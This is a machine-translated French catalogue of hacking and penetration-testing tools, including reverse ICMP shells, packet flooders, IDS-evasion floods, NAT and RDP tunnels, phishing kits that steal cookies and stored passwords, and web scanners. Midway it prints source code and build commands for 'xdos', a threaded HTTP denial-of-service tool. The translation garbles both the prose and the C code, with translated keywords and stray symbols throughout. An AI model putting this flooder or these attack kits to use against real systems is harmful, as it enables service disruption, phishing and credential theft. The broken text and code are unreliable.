.com / inquisb / icmpsh http://bernardodamele.principalement codées par Nico. Il vous permet de reproduire plusieurs MITM. Teamspeak. est livré ave c un démon en cluster à distance et un assistant interactif attaque.com/2011/04/reverse-connection-icmp-shell . P erl ou Python code. c'est qu'il ne nécessite pas de privilèges d'administrateur pour exécuter sur la machine cible. DoS et DDoS scénarios d'attaque. Caractéristiques * Les logiciels libres . Postgres. Caractéristiques * Inondations ARP-Request * Empoisonnement ARP Cache* Inondations PPPoE d'initiation de session * Cessation Blind session PPPoE * Inondations ICMP Echo* Attaque ICMP-Schtroumpf * ICMP base TCP-Connection reset * Inondations TCP SYN* Attaque TCP-Land * Blind TCP-Connection reset * Inondations UDP * Inondations DNS-Query * Inondations DHCP Découvrez * Attaque la famine DHCP * DHCP Release forcer * Cisco HSRP routeur actif détournement * Le modèle de configuration basé sur l'adresse de paquets * Adresse intelligente et de détection de protocole adresse * Randomisation Smart générique à base de * Démon pour la mise en place des réseaux d'attaque à distance icmpsh https: / / github. SAP/R3.blogspot. Cisco permet tent. hyenae http://sourceforge. ldap2. de donner aux chercheurs et à la sécurité consultants la possibilité de présenter la façon dont il serait facile d'accéder sans au torisation l'accès à distance à partir d'un système. * L'utilisateur exécutant l'esclave sur le système cible ne nécessite pas de privilèges d'administration. AFP. auth Cisco. ldap2. * Le capitaine est portable sur toute plate-forme qui peut fonctionner soit C. * Architecture client / serveur. * Le système cible doit être Windows parce que l'esclave fonctionne sur cette plateforme uniquement pour l'instant. Un Shell ICMP Simple inverse! Le principal avantage sur les autres outils open source.. Cisco AAA (incorporée dans le module telnet). fourchue par moi.ICQ. Cet outil est un code preuve de concept. normalisé LDAP3.net/projects/hyenae/ Hyenae est une plateforme très flexible indépendante générateur de paquets réseau. inundator .

vous pouvez trouver des bugs dans votre (entreprise?) Réseau (ou autres).php/Nbtool Quelques outils pour NetBIOS et DNS enquête.skullsecurity. L'espoir est que si votre at taque est détectée par l'IDS. Quand utiliser inundator? inundator sera utilisé même si vous pensez qu'il ya une chance importante de l'attaq ue que vous vous apprêtez à effectuer peuvent être détectés par le système de la cible de dét ction d'intrusion.google. et cont inuer à bien fonctionner après avoir fini de l'attaque.com/p/natprobe/ Ce petit programme. Caractéristiques * DNS backdoor (dnscat) o v0. essayez d'envoyer des paquets ICMP sur le résea u local. Pentecôte cela. mais le dest mac sur le réseau Ethernet est le mac à la porte d'entrée.04 NetBIOS * requêtes.Vous lancement inundator avant de commencer l'attaque. la file d'attente à moteur. on peut découvrir plus d'une case configuré pour être une passerelle.org/wiki/index. Parfois. l'alerte sera enterré parmi plusieurs milliers de faux p ositifs. C'est la même chose. les attaques. par exemple pour les hôtes qui permettent des connexions P2P.org/ncat/ NCAT est un utilitaire réseau doté de nombreuses fonctions qui lit et écrit les données à travers les réseaux de la ligne de commande.NCAT a été écrit pour le projet Nmap comme u ne ré-implémentation nettement améliorée de la vénérable Netcat. les enregistrements. et les rejets (nbquery) NetBIOS * sniff et l'empoisonnement (nbsniff) * Cross-site scripting sur DNS (dnsxss) * DNS sniffer (dnslogger) * Testeur de DNS (dnstest) NCAT http://nmap. nous pouvons savoir qui est la passerelle lorsque nous recive une réponse de ce mac. Si nous envoyons un paquet à l'macs diferents dans la langue. nous envoyons les paquets avec dest IP de la cible. en général. outil de l'évasion IDS. et de la communication. S on but est de façon anonyme inondations systèmes de détection d'intrusion (Snort préciséme nt) avec un trafic destiné à déclencher de faux positifs par le biais d'un proxy SOCKS afin de masquer une attaque réelle.net/projects/inundator/ IDS / IPS WAF Evasion / & Tool inondations Qu'est-ce que inundator? inundator est un multi-thread. ce qui réduit la possibilité d'un analyste IDS détecter l'attaque réelle.http://sourceforge. parce que le script seulement vérifier si la réponse mac. il s'agit d'une mauvaise configuration. Explication Lorsque nous utilisons une passerelle. natprobe http://code. Il utilise à la fois TCP et DP pour la communication et est conçu pour être un outil fiable back-end pour fourni . et la boîte de réponse avec un ICMP-Redirec t. mais très utile. nbtool http://www. et de détecter tous les hôtes qui le permettent.

Il a ensuite tous les groupes d'adresses IP b asées sur le nombre de sauts. etc) o Plus de protocoles dans les œuvres . ICMPv4.. no. éclate. Caractéristiques ¶ * Fonctionne sur Windows.org/testyourisp/pcapdiff Pcapdiff est un outil développé par le FEP pour comparer deux captures de paquets et de déterminer quels pourraient être contrefaits. Pour la li ste complète des fonctionnalités voir ci-dessous. ICMPv6.préciser certains ou tous les octets dans un paque t * L'utilisateur script défini pour remplacer un protocole non implémentée (EXPERIMENTA L) * Protocoles de la pile dans n'importe quel ordre arbitraire * Créer et configurer plusieurs flux * Les taux de flux Configurer.r instantanément une connectivité réseau vers d'autres applications et utilisateurs.. IPv6. UDP. tombé ou paquets mutilé. 4over4.google. nwmap http://sourceforge. mais cela n'a pas été testé) * Support des protocoles les plus courants standard o SNAP Ethernet/802. RTSP. Linux. 6over6) O TCP. N CAT permettra non seulement de travailler avec IPv4 et IPv6. SIP. IPv4. Il prend alors le masque de / 24 et recherche dans tous ces sous-réseaux pour vivre IP. MLD o Un protocole basé sur du texte (HTTP.eff.com/p/ostinato/ Ostinato est un open-source. mais fournit à l'util isateur un nombre pratiquement illimité d'utilisations potentielles.net/projects/nwmap/ Il s'agit d'un script Perl qui prend un fichier PPCE en entrée et identifie les so us-réseaux valides dans le même.Artisanat et envoyer des paquets d e plusieurs flux avec des protocoles différents à des vitesses différentes. NNTP. de paquets * Seul client peut contrôler et de configurer plusieurs ports sur plusieurs ordina teurs générer du trafic * Le contrôle exclusif d'un port pour empêcher le système d'exploitation d'envoyer des paquets errants fournit un environnement de test contrôlé * Statistiques fenêtre montre en temps réel du port de réception / transmission des st atistiques et des taux * Capture de paquets et de les visualiser (besoins Wireshark pour afficher les p aquets capturés) * Cadre d'ajouter facilement de nouveaux constructeurs protocole pcapdiff http://www.3/LLC VLAN o (avec QinQ) ARP o. ostinato http://code. IP-in-Tunnels IP IP alias (6over4. IGMP. Ostinato vise à être «Wireshark in Reverse" et devenir complémentaire de Wireshark. multi-plateforme artisan paquet réseau générateur de traf ic et / analyseur avec un GUI facile à utiliser. par exemple changer adresses IP / MAC) * Utilisateur fourni Hex Dump . 4over6. Deux amis tec hniquement incliné peut mettre en place des captures de paquets (tcpdump par exemp . BSD et Mac OS X (fonctionnera probablement sur d'autres plateformes également avec peu ou aucune modification. * Modifier tous les champs de n'importe quel protocole (certains protocoles perm ettent de changer les champs des paquets avec tous les paquets au moment de l'exéc ution.

Plus important encore. pwnat http://samy. vous pourriez demander. Proxocket est tout simplement deux fichiers DLL (ws2_32.ossir. il s'agit d'un serveur proxy qui fonctionne derrière un NAT. sans troisième partie. et pas de trucs DNS.dll) qui doivent être placés dans le même répertoire que l'exe. qui crypter tout le trafic sortant. est un outil qui permet à tout nombre de clients derrière des NAT de communiquer avec un serveur derrière un NAT séparée avec * pas de redirection de port * * et aucune configuration DMZ * sur tous les routeurs pour faire directement communiquer les uns avec les autres. Le serveur n'a pas besoin de savoir quoi que ce soit sur les clients essayant de se connecter.altervista. mais tous les paquets transmis est aussi écrit dans un fichie r PAC.pdf . pas de UPnP / STUN / ICE requis. Je suis en f ait assez sûr de nombreux développeurs de logiciels utilisent des sockets localhost quand ils ont besoin pour assurer l'échange de données entre les différents processus. ils peuvent courir pcapdiff sur les deux fichiers de capture de paquets pour identifier les paquets suspects po ur complément d'enquête.dll et w sock32. qui peut être utilisé pour capturer les appels entre une application et les fonctions Winsoc k dans Windows. rdp2tcp http://rdp2tcp. prononcé "poe-nat". même lorsque le client est derrière un NAT. Vous pouvez ainsi utiliser Proxocket afin de capturer le trafic réseau AVANT il e st chiffré par Stunnel ou TOR. Causes de l'application de charger les DLL proxy plutôt que les DLL Winsock réel. DLL proxy Mise Luigi dans le même d ossier que le fichier exe. Localhost connexions sont également utilisés lorsque Stunnel en cours d'exécution ou d e procurations TOR sur votre machine locale. il permet aussi de scruter le trafic va localhost. J' ai personnellement utilisé prises localhost dans mes applications quand je code en cours d'exécution dans différents processus ou threads et ont besoin d'un moyen eff icace pour eux d'échanger des données de manière asynchrone (NetworkMiner ne pas en ut iliser localhost pour la communication inter-processus.pl/pwnat/ pwnat.le ou Wireshark) sur leurs propres ordinateurs et de produire le trafic réseau ent re les deux ordinateurs sur Internet. Plus tard. De l'application pour laquelle vous voulez surveiller le trafic réseau. pas de proxy.sourceforge. qui résident dans "C: \ Windows \ System32 \".net/ http://www. cependant). pas de troisième partie. Mais pourquoi quel qu'un voudrait-il établir une connexion réseau à localhost. Proxocket relais tous les paquets entre l'application e t le réel Winsock DLL. Proxocket injecte entre l'application et Winsock Non seulement Proxocket vous permettent de sniffer le trafic vers et à partir d'un e application sans avoir à charger un pilote de réseau ou une application raw socket renifler.org/mytoolz. Il n'y a pas d'intermédiaire. aucune usurpation. Proxocket par. le client peut alors se connecter à tout d'accueil ou d'un port sur un hôte distant ou à un hôte fixe et port a décidé par le serveur.htm # Luigi Auriemma a construit un outil formidable qui s'appelle Proxocket.Ceux-ci agissent en tant que fichiers DLL procurations vers les fichiers réels Winsock DLL (avec les mêmes noms) .org/paris/supports/2010/2010-12-14/rdp2tcp. proxocket proxocket http://aluigi. Autrement dit.

et natif Win32.com/p/tcpjunk/ Tcpjunk est un des protocoles TCP générales d'essai et le piratage des services publ ics. int timeout). connect_tv int $ statique (struct sockaddr_in * addr. $ Statique DWORD WINAPI dosmain (p LPVOID).c néant Un outil simple HTTP DoS! xdos. Caractéristiques principales: ¶ * Prise en charge IPv4/IPv6 * Automatiquement envoyer / recevoir des données en fonction de configuration de s ession prédéfinie * Le mode Client / Serveur * Prise en charge SSL * Données dynamiques d'insertion et de manipulation en utilisant les balises Génération de trafic * * En mode graphique udptunnel http://code.google. Fonctionne dans l'espace utilisateur sur Linux.c $ $ $ $ # # # # Define WIN32_LEAN_AND_MEAN Include Include Include $ Unsigned long fil = 0. Cygwin (avec extension IPv6). la gestion des tunnels est effectuée par le contrôleur (sur le côté client).com/p/udptunnel/ Tunnels TCP sur les paquets UDP. Solaris. Fonctions disponibles: * Transfert de port TCP * Transfert inverse de port TCP stdin processus de transfert * / out * SOCKS5 soutien minimal Le code est découpé en 2 parties: * Le client en cours d'exécution sur le côté client rdesktop * Le serveur qui tourne sur le côté serveur Terminal Server Une fois que les clients rdp2tcp et le serveur sont exécutés. Actuellement il n'y a pa s d'authentification ou de chiffrement xdos. tcpjunk http://code. char * argv []) . Il utilise les capacités de RDP canal virtuel pour multiplexer plusieurs ports d 'expédition sur une session rdesktop déjà établi.Le contrôleur général écouter sur local t (port 8477) d'attente pour les inscriptions nouveau tunnel.rdp2tcp est un outil de tunneling sur le dessus de Remote Desktop Protocol (RDP) . const $ int main (int argc.google.

$ Tv. sizeof (saddr)). $ 1 de retour. 0. $ Saddr. $ $ Pour (. $ Return 0. $ FD_ZERO (& err_fds). wr_fds fd_set $. [0]). $} $ Puts ("OPE Initier . IPPROTO_TCP).tv_usec = 0. et tv).$ { $ If (argc! = 4) { $ Puts ("\ t \ t \ t \ tXDOS . $ FD_SET (s.s_addr = inet_addr (argv [1]). & err_fds. $ If (i! = SOCKET_ERROR) $ Goto exit_connected. $ If (i == WSAENOBUFS) { $ Sleep (50). $ Goto exit_err. err_fds. $ $ Pour (i = 1. SOCK_STREAM.tv_sec $ / 1000. $ Dosmain (& saddr). $} connect_tv int $ statique (struct sockaddr_in * addr. i + +) CreateThread (0. $ timeout = tv. $ Printf (: argv "Usage% s [IP] [Port] [Sujets] \ n".. $ If (s == 0 | | s == INVALID_SOCKET) return 0. $ Continuer.sin_family = AF_INET. $ Struct sockaddr_in saddr. . $ Puts ("déroulement de l'attaque engagée \ n"). & wr_fds). $ I = WSAGetLastError (). $ FD_SET (s. int timeout) $ { $ S int. $ $ S = socket (PF_INET. $ I unsigned long. $ $ If (i == 0 | | i == -1) $ Goto exit_err. $ Int i. sizeof (struct sockaddr_in)). & tid). & err_fds). \ n"). i <= atoi (argv [3]). $ Saddr. NULL.sin_port = (short) htons (atoi (argv [2])).0. $ Ioctlsocket (s. $ $ I = 1. $ Struct timeval tv. $ I = select (s +1. FIONBIO..) { $ I = communiquer (s.sin_addr. & wr_fds. & i). $} $ If (i == WSAEWOULDBLOCK) $ Break.par Bull Moose \ n"). $} $ $ FD_ZERO (& wr_fds). $ $ Memset (& saddr.. (LPVOID) & saddr. dosmain. (struct sockaddr *) addr. '\ 0'. $ Saddr. $ Unsigned long tid.

$} $} $ Ex: ExitThread (0). $ Return 0. Cet outil va accéder à Internet depuis invite de c ommande. $ Pour (. $ Return 0. $ $ Printf ("% u nombre Thread lancé \ n!". $ Addr = * (struct sockaddr_in *) p.in/tools/Index. C'EST SHELL DE SÉCURITÉ puissante qui peut être pénétrer dans tout type DE LA DEMANDE WEB.. $} $ Statique DWORD WINAPI dosmain (p LPVOID) $ { Extern unsigned $ long fil. IL fat ch VULNARABLITY liés à la sécurité et il affichera ET CONSERVER sa sortie dans les fichi ers spécifiques.0. CET OUTIL EST couvrant presque tous les techniques de piratage et de pénétrati on. $ Sleep (300). $} Else if (sock == SOCKET_ERROR) { $ Puts ("Erreur:. & i). $ Struct sockaddr_in addr. $ $ Exit_err: closesocket $ (s).bat @ Xdos. $ Char Buffer [] = \ $ "GET / HTTP/1. THREAD_PRIORITY_BELOW_NORMAL). & wr_fds)) $ Goto exit_err. $ If (chaussette! = 0) { $ Send (sock.co. FIONBIO. Erreur de socket \ n").0. $ If (p == NULL) Début ex.exe gcc-S-O-o-xdos. $ Sock int. & err_fds) | |! FD_ISSET (s. closesocket $ (sock). $ SetThreadPriority (GetCurrentThread (). 8). $} $ $ Befire supprimer tous les compiler make.) { $ Sock = connect_tv (& addr.1 \ r \ n \ r \ n". Il va ajouter QUELQUES FONCTIONNALITE SUPPLÉMENTAIRES SUR LA BASE DE SÉCU RITÉ ET DE PENETRATION à votre shell.php RPSS (Remote Shell SÉCURITÉ Penetration Testing) est l'outil EXTENSION DE VOTRE SHEL L ou bash. $ S le retour.c lws2_32 RPSS http://celnet. thread $ + +. $ Ioctlsocket (s. $ $ Exit_connected: $ I = 0. cela Worke outil comme un BROUSER DE shell de commande. Si vous êtes expérimenté TESTEUR HACKERSAFE ou la pénétration. Buffer. ExitProcess $ (1). strlen (Buffer).En gros.1 \ r \ n" $ "Host: 127. En gros.$ If (FD_ISSET (s. Fils). si vous êtes nouveau dans MONDE ET SECURITRY vous avez des devoirs dif ficiles à pénétrer APPLICATION WEB DE NOMBREUX QUE VOUS POUVEZ ALORS accomplir votre tâc . 0). puis en uti lisant cet outil vous pouvez rendre votre processus de pénétration plus rapide et fa cile.

he en quelques heures UTILISANT RPSS. Pourquoi RPSS? Si nous parlons Techniquement ENTIER PROGRAMMATION RPSS a été faite selon Thread Thr ead grand nombre se fait CREAT POUR REMPLIR UN PROCESSUS. SO le temps d'exécution ET PROCESSUS DE RPSS est très rapide, puis Outils AUTRES. La logique de chaque tâche est très unique, il ira à l'encontre TOUT DE LA CIBLE. Ce n'est pas chose cet objec tif n'a STRONG du firewall, système de détection d'intrusion ou ET FILTARATION IP es t installé.RPSS SERA PAR passer tous les couches de sécurité et il vous fournira des R ISULT PRÉCISE. VOUS pouvez utiliser cet outil dans un but différent, comme les tests PENETRATION JURIDIQUE, TESTER VOTRE PROPRE WebApplication VULNARABLITIES, BUT e nquête médico-légale, tester les composants SEUCRITY ETC ... FONCTION PROXY 1> getProxy 2 Testproxylist> 3> Testproxy 4 autoproxy> 5> Jumping 6> Loadproxy 7> supprimer 8> Modification PIED D'IMPRESSION 9 ip> se 10 adresses smtp> accaparement 11> traçage bruts 12> identifier la technologie de serveur (en-tête) 13> collecte plein d'infos serveur tête 14> ramper e-mails provenant des moteurs de recherche (capacité de suivre des emai ls trop compliqué) 15 site> rampants (liens s'agiter de même répertoire) 16 Finder> page de connexion (soutien à des ASP, ASPX, PHP, CFM, JSP, HTML, HTM, s ans des charges utiles) 17 sous> recensement de domaine 18 titres> nom d'hôte de la gamme IP Analyse 19> service de serveurs Web 20 structure du site> empreintes digitales 21> qui est rechercher 22> inverser 23> énumère les utilisateurs du serveur D'impression 24> pied démon 25 système d'exploitation> impression pied 26> SSLcheck (par cette tâche, vous pouvez tester chiffrement SSL) 27> DBcheck (par cette tâche, vous pouvez tester la base de données) 28> La surveillance de serveur web ANALYSE 29> obtenir des informations de port + d'infos service (avec du fil de manière très rapide) D'injection 30> SQL Scan automobile de 30,1> numérisation url auto-30.2> la création d'url exploitable auto-30.3> cheacking version auto-30.4> fusée table D'injection 31> balayage aléatoire 32 LFI> scan 33 rfi> scan 34 rce> scan 35 xss> scan (HTTPS soutien aussi)

36 cgi> scan (chemins vuln plus) 37 cm> scan (joomla soutien, etc ... REMOB) 38> analyse personnalisée 39> analyse complète Testant 40> ftp bruiting (premier chèque de connexion anonyme) 41> bruiting smtp 42> bruiting imap 43> bruiting nntp 44> bruiting pop3 45> débrutage RDP 46 rdp> débrutage de plage d'adresses IP CRYPTAGE 47> Hashid 48 Onlinehash> 49 Autohash> 50> Md5 51> Sha1 52> SHA256 53> SHA384 54> SHA512 55> Base64enc 56> Base64dec SOUTIEN 57 constructeurs liste de mots> utilisant une combinaison personnalisée 58> extraire des adresses IP à partir de fichiers 59> extraire des courriels à partir de fichiers 60> ramper mots de l'un des web qui vous est donnée par 61 utilitaire wget> Task Server 62> obtenir des informations de port + d'infos service (avec du fil de manière très rapide) 63 d'injection SQL> scan auto-63.1> numérisation url auto-63.2> la création d'url exploitable auto-63.3> cheacking version auto-63.4> fusée table D'injection 64> balayage aléatoire 65 LFI> scan 66 rfi> scan 67 rce> scan 68 xss> scan (HTTPS soutien aussi) 69 cgi> scan (chemins vuln plus) 70 cms> scan (joomla soutien, etc ... REMOB) 71> analyse personnalisée 72> analyse complète VERBOUS TASK 73> obtenir des informations de port + d'infos service (avec du fil de manière très rapide) 74 d'injection SQL> scan auto-74.1> numérisation url auto-74.2> la création d'url exploitable auto-74.3> cheacking version auto-74.4> fusée table 75 d'injection> balayage aléatoire 76 LFI> scan 77 rfi> scan 78 rce> scan 79 xss> scan (HTTPS soutien aussi) 80 cgi> scan (chemins vuln plus)

81 cm> scan (joomla soutien, etc ... REMOB) 82> analyse personnalisée 83> analyse complète FORENSIC 84 analyse maleware> 85 analyse de Troie> (tâche très stupide) Exe 86> à lot 87 Fileanalysis> 88 iptrace> Pentest (DE TRAVAIL SUR LA TÂCHE FEW) 89> Penmysql 90> Penpostgray 91> Penmssql 92 Penoracle> 93 Penaccess> EXPLOIT (pas testé tous) 94 Expsearch> 95> Milexpgrab 96> Pacexpgrab 97> Mad 98 Boa> 99 Buletftp> 100 CesarFTP> 101 Efs> GOOGLE DORK (TÂCHE années a PROBLÈME DE TRAVAIL SUR IT) 102 Dorkscan> 103 sous-balayage> 104 Gvscan> 105 Shellscan> 106 Ranker> 107 Usergrab> 108 Dorkcreator> 109 Cmsscan> RACINE (en développement) 110> Bandtest 111> Les inondations 112 Honeypot> 113> Chat 114> Jeux 115 Ids> 116 automachine> Ingénierie sociale Imposteur http://www.andlabs.org/tools.html Imposteur est un cadre flexible pour effectuer navigateur attaques de phishing. Une fois le système en cours d'exécution Imposter est configuré comme serveur DNS pour les victimes, le serveur DNS interne de Imposter résout toutes les requêtes DNS à lui -même. Lorsque la victime essaie d'accéder à tout site Web du domaine décide de le système qui exécute le serveur Imposter et Imposter Web interne sert du contenu de la victime. Selon la configuration des charges utiles sont envoyés à la victime. Les données volées à la victime est renvoyée à imposteur et il est stocké dans une base de données SQLite da ns un dossier créé avec son nom basé sur la date et l'heure de l'attaque. Les listes des attaques effectuées sont:

page malveillante vous donne l'adresse ip de la victime.3 * WinPcap doit être installé sur le système S-E Ninja http://www.com Msn.com Caractéristiques: * Fakepages.3 Raisons: o interne du serveur DNS résout tous les domaines à 192.* * * * * * * * Cookies Steal Placer des cookies Steal Local Shared Objects Mots de passe stockés Steal de FireFox Les fichiers mis en cache Steal Cache du navigateur Poison Les fichiers Steal du système de la victime fichier local via Internet Explorer Exécuter des requêtes SQL sur Google de la victime base de données Gears et transférer les résultats * Créer un ResourceStore et gérés ResourceStore sur LocalServer de la victime Google G ears Exigences générales: * Des droits d'administration: Raisons: o Imposter écoute sur les ports et 53/UDP 80/TCP o Le module 'Stealer File' exécute un détecteur interne * Système exécutant Imposter doit avoir l'adresse IP 192. avec des pages 20-25 sites populaires faux et mailer anonyme via fonction mail () en PHP.h tml SE Ninja est un outil d'ingénierie sociale.com Yahoo. Vous pouvez envoyer un message anonyme utilisant PHP mail () Fonction / [SENINJA .com Hotmail.com (hotmail) Myspace.com Facebook.1.com Youtube.168.com Digg. FR Langs) Paypal.com Ebuddy.com/toolswatch/Social-Engineering-Ninja-v0-1-Beta. FR Langs) Twitter. * Mailer. Sites disponibles: * * * * * * * * * * * * * * Amazon.168.com (AR.com Gmail.security-database.1.com Onecard.com Travian.com (AR. * IP.

] / admin / mail et vous pouvez obtenir votre ip victime le mettre dans la base de données "/ [SENINJA] / ip /" Télécharger à partir de http://brokenpixel.com/images/seninja.zip Boîte à outils d'ingénierie sociale http://www.social-engineer.org/resources/set.html "La boîte à outils d'ingénierie sociale (SET) est une rsonnalisés qui se concentre uniquement sur l'attaque pénétration. Son but principal est d'accroître et de sociale et permettre à l'appareil d'essai pour tester attaque ciblée peut réussir. " VOIP UCSniff http://ucsniff.sourceforge.net/ UCSniff est un VoIP et IP Video Security outil d'évaluation qui intègre les logiciel s open source existants dans plusieurs fonctions utiles, permettant la VoIP et I P propriétaires vidéo et professionnels de la sécurité de tester rapidement la menace de non autorisées et contre les écoutes VoIP vidéo. Ecrit en C / C + +, et disponible su r Linux et Windows, le logiciel est gratuit et disponible pour quiconque veut le s télécharger, sous la licence GPLv3. Certaines fonctionnalités utiles de UCSniff qui ont été combinés en un seul paquet: Videojak http://videojak.sourceforge.net/ VideoJak est un outil de vidéo sur IP évaluation de la sécurité qui peut simuler une pre uve de concept ou d'interception vidéo test rejouer contre une cible, la session v idéo sélectionnée par l'utilisateur. VideoJak est le premier de son genre outil de sécur ité qui analyse vidéo codec normes telles que H.264. VideoJak consiste tout d'abord capturer le port RTP utilisés dans une conversation vidéo ou d'un ruisseau. Ensuite, VideoJak analyse les paquets RTP, la collecte des numéros de séquence RTP et les va leurs timestamp utilisé entre les terminaux vidéo. Puis VideoJak crée une charge utile de vidéo personnalisé en changeant les numéros de séquence et les valeurs timestamp uti lisé dans les paquets RTP d'origine entre les deux terminaux vidéo. Après que l'utilis ateur sélectionne un dispositif vidéo et conçues pour l'attaque lors d'une séance vidéo en cours, VideoJak fournit la charge utile sur le port appris RTP contre la cible. Il en résulte attaque dans un des plusieurs nouvelles fonctionnalités: Web Andiparos suite python-conduit d'outils pe de l'élément humain des tests de simuler des attaques d'ingénierie efficacement la façon dont une

http://code.google.com/p/andiparos/ Andiparos est un fork du célèbre Proxy Paros. Il s'agit d'une web application open s ource outil d'évaluation de la sécurité que donne la capacité testeurs de pénétration à l'ara gnée sites Web, d'analyser le contenu, d'intercepter et modifier les demandes, etc L'avantage de Andiparos est principalement le soutien des certificats clients su r cartes à puce. En outre, il dispose de plusieurs améliorations de l'interface peti tes, ce qui rend la vie plus facile pour les testeurs de pénétration ... Arachni http://github.com/Zapotek/arachni {} Arachni est un cadre complet de fonctionnalités et modulaire qui permet Ruby te

steurs de pénétration et aux administrateurs d'évaluer la sécurité des applications web. {} Arachni est intelligent, il se forme à chaque réponse HTTP qu'il reçoit au cours du processus d'audit. Contrairement à d'autres scanners, Arachni prend en compte la nature dynamique des applications web et peut détecter les changements causés lors d'un voyage à travers chaque chemin de la complexité cyclomatique d'une application Web. Cette façon vecteurs d'attaque d'entrée / qui seraient autrement indétectables par les non-humains sont parfaitement gérées par Arachni. Caractéristiques de Arachni: * Fournir un cadre stable et efficace * Soyez simple * Le soutien Cookie-jar * Le support de SSL. * User Agent spoofing. * Support de proxy SOCKS et HTTP pour les (S). * SOCKS support est fourni gracieusement par socksify. * L'authentification du proxy. * L'authentification du site. * Local DNS limites cache des requêtes de résolution de nom. * Lib de sortie personnalisés. * Le système utilise ses propres enveloppes d'impression pour afficher des message s. * Sortie en surbrillance la ligne de commande, le style Metasploit. * Exécuter mods dernière option. * Permet d'exécuter les modules après analyse du site est terminée. * Abstraction d'assurance-chômage. * Seuls {Arachni:: UI:: CLI} pour le moment, mais WebUI & GUI sont relativement faciles à mettre en œuvre dès maintenant. * Les Pièges Ctrl-C interrompre. Interruptions * suspendre le système, l'utilisateur a alors la possibilité soit de r eprendre ou de sortie. Le Site Crawler inclus avec Arachni a les caractéristiques suivantes: Le robot est fournie par Anemone avec quelques légères modifications pour tenir comp te des fonctionnalités supplémentaires. * Filtres pour les pages redondantes, comme les galeries, catalogues, etc basés su r des expressions régulières et des compteurs. exclusion URL * filtre basé sur les expressions régulières. inclusion URL * filtre basé sur les expressions régulières. * Les séjours dans le domaine par défaut et il va probablement le rester. * Peut éventuellement suivre les sous-domaines. * Multi-thread avec un nombre de thread réglable. * La limite de profondeur réglable. * Réglable limite nombre de liens. * Réglable rediriger limite. L'analyseur de code HTML fourni par Arachni offre les fonctions suivantes: Peut extraire et d'analyser: * Formulaires * Liens * Cookies BlindElephant

http://blindelephant.sourceforge.net/ Le BlindElephant Web Application Fingerprinter tente de découvrir la version d'une application web (connu) en comparant les fichiers statiques à des endroits connus contre les hachages précalculées pour les versions de ces fichiers dans tous les to us les communiqués disponibles. La technique est rapide, à faible bande passante, no n-invasive, générique et fortement automatisé. BodgeIt Store https: / / code.google.com / p / bodgeit / La Boutique BodgeIt est une application web vulnérable qui est actuellement destiné aux personnes qui sont nouveaux à l'essai stylo. Certaines de ses fonctionnalités et caractéristiques: * Facile à installer - il suffit nécessite java et un moteur de Tomcat * Autonomes (pas de dépendances supplémentaires autres que de 2 sus) * Facile de changer à la volée - toutes les fonctionnalités est P, donc pas nécessaire IDE * Plate-forme de croix * Open source * Pas de db séparée à installer et à configurer - il utilise un tomatiquement (re) initialisé au démarrage servlet, par exemple dans la ligne ci-des mis en œuvre dans les JS

"en mémoire" db qui est au

Tout ce que vous devez faire est de télécharger et d'ouvrir le fichier zip, puis ext rayez le fichier war dans le répertoire des webapps votre moteur de servlets favor i. Ensuite, pointez votre navigateur sur (par exemple) http://localhost:8080/bodgei t Vous pouvez trouver plus facile de trouver des vulnérabilités en utilisant un outil de test stylo. Si vous n'avez pas un favori, je vous le recommande le Zed Attack Proxy (pour le quel je suis le chef de projet). Le Bodge Il Store incluent les vulnérabilités majeures suivantes: * Cross Site Scripting * Injection SQL * Cachée (mais non protégés) contenu * Faux Croix-Site Request déboguer le code * Références * Objet insécurité vulnérabilités * logique de demande Navigateur Fuzzer http://www.krakowlabs.com/dev.html Navigateur Fuzzer 3 est conçu comme un cadre hybride / fuzzer autonome; les module s qu'il utilise sont extensibles, mais aussi fortement intégré dans le noyau. BF3 pe ut être utilisé via la ligne de commande pour régler tous les drapeaux nécessaires pour chaque opération de fuzzing. Après l'initialisation, BF3 crée des cas de test dans un système numérotées. Le fuzzing est automatisée par le biais du navigateur en utilisant l a méthode d'actualisation. Si l'erreur est détectée, les journaux du serveur peuvent d onner une idée du scénario de test délinquance.

engineeringforfun. * Configurés de manière centralisée les paramètres de proxy en amont. [Version Pro uniquement] * Fonction de recherche Suite à l'échelle. les proxies amont.contextis. JavaScript et XML Avec et sans assistance Modes Fuzzing Génération 7 Fuzzing Oracle Générateur aléatoire de données Mutation Fuzzing moteur Browser Rider http://www. d'attaque et exploiter des applications web. Tous les outils partagent le même cadre robuste pour la gestion des requêtes HTTP. * Entièrement véritable scanner de vulnérabilités web. d'alerte et d'extensibilité. Principales caractéristiques propres à l'Burp Suite comprennent: * L'analyse détaillée et le rendu des demandes et réponses. * Fonctionne dans les deux sous Linux et Windows. à toutes les demandes provenant de navigateur de l'utilisateur. DOM.co. Burp Suite http://portswigger. * Utilitaires pour le décodage et la comparaison des données d'application. [Version Pro uniquement] * Analyse compatible FIPS statistiques de hasard jeton de session. CAT http://www.com/ BrowserRider est un cadre intégré pour exploiter les vulnérabilités par cross site scrip ting. de conduite de nombreuses actions o util individuel. l'authentific ation. la persistance.uk/resources/tools/cat/ CAT est conçu pour faciliter la pénétration de l'application web manuel d'essai pour p lus complexes. Les différents outils Burp collaborer efficacement pour partager des informations et p ermettre les résultats identifiés dans un seul outil pour former la base d'une attaq ue à l'aide d'un autre. * Outils peut fonctionner dans une seule fenêtre à onglets. de numérisation.Caractéristiques CSS Fuzz. [Version Pro uniquement] * Possibilité de sauvegarder et de restaurer l'état.net/suite/ Burp Suite est une plate-forme intégrée pour attaquer les applications web. HTML. ou être détachés dans des fenêtr es individuelles. le web et l'authen tification de proxy. * Suite au niveau configuration champ cible. * Extensibilité via l'interface IBurpExtender. [Version Pro uniquement] * Support des clients personnalisés et des certificats SSL serveur. * Une gamme d'outils de l'engagement. d'analyser. * One-click transfert des demandes intéressante entre les outils. * L'information Plan du site montrant accumulés sur les applications cibles dans l 'arbre et sous forme de tableau. pour rendre votre travail plus rapide et p lus efficace. * Possibilité de «passivement» une demande d'araignée d'une manière non-intrusive. Son but est de prouver l'impact de cette vulnérabilité lors d'une évaluation de la vulnérabilité. exigeant des tâches de test d'applications. et l'exploitation forestière. l'exploitation forestière. Burp Suite vous permet de combiner des techniques manuelles et automatiques d'énumér er. Il conti ent tous les outils Burp avec de nombreuses interfaces entre eux visant à facilite r et accélérer le processus d'attaquer une application. Il élimine certains des éléme .

